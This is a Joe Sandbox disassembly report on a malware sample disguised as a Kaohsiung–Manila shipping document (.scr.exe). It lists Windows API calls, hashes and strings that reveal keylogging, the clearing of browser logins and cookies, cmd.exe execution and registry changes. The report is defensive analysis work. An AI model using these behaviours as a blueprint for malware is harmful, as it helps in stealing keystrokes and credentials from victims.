                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                                      • API String ID: 2506810119-3579038444
                                                      • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                      • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                      • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                      • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                        • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                        • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                      • String ID: /sort "Visit Time" /stext "$8>G
                                                      • API String ID: 368326130-2663660666
                                                      • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                      • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                      • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                      • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                      • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                      • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTimewsprintf
                                                      • String ID: Offline Keylogger Started
                                                      • API String ID: 465354869-4114347211
                                                      • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                      • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                      • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                      • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                      APIs
                                                        • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                        • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                      • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                      • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                      • String ID: Online Keylogger Started
                                                      • API String ID: 112202259-1258561607
                                                      • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                      • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                      • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                      • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                      • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                      • __dosmaperr.LIBCMT ref: 0044AAFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID: `@
                                                      • API String ID: 2583163307-951712118
                                                      • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                      • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                      • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                      • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00404946
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                      • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$EventLocalThreadTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 2532271599-1507639952
                                                      • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                      • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                      • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                      • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                      • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                      • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandleObjectSingleWait
                                                      • String ID: Connection Timeout
                                                      • API String ID: 2055531096-499159329
                                                      • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                      • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                      • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                      • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                        • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                        • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                      • String ID: bad locale name
                                                      • API String ID: 3628047217-1405518554
                                                      • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                      • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                      • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                      • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                      • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                      • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Control Panel\Desktop
                                                      • API String ID: 1818849710-27424756
                                                      • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                      • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                      • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                      • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: TUF
                                                      • API String ID: 1818849710-3431404234
                                                      • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                      • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                      • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                      • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID: /C $cmd.exe$open
                                                      • API String ID: 587946157-3896048727
                                                      • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                      • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                      • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                      • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: GetCursorInfo$User32.dll
                                                      • API String ID: 1646373207-2714051624
                                                      • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                      • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                      • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                      • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetLastInputInfo$User32.dll
                                                      • API String ID: 2574300362-1519888992
                                                      • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                      • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                      • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                      • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                      • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                      • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                      • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                      • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                      • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                      • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 3360349984-0
                                                      • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                      • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                      • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                      • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                      APIs
                                                      Strings
                                                      • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                      • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                      • API String ID: 3472027048-1236744412
                                                      • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                      • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                      • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                      • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                      APIs
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQuerySleepValue
                                                      • String ID: @CG$exepath$BG
                                                      • API String ID: 4119054056-3221201242
                                                      • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                      • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                      • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                      • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                      APIs
                                                        • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                        • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                        • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                      • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                      • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$SleepText$ForegroundLength
                                                      • String ID: [ $ ]
                                                      • API String ID: 3309952895-93608704
                                                      • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                      • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                      • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                      • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                      • String ID:
                                                      • API String ID: 3604237281-0
                                                      • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                      • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                      • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                      • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                      • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                      • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                      • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                      • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                      • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                      • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                        • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                        • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                      • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
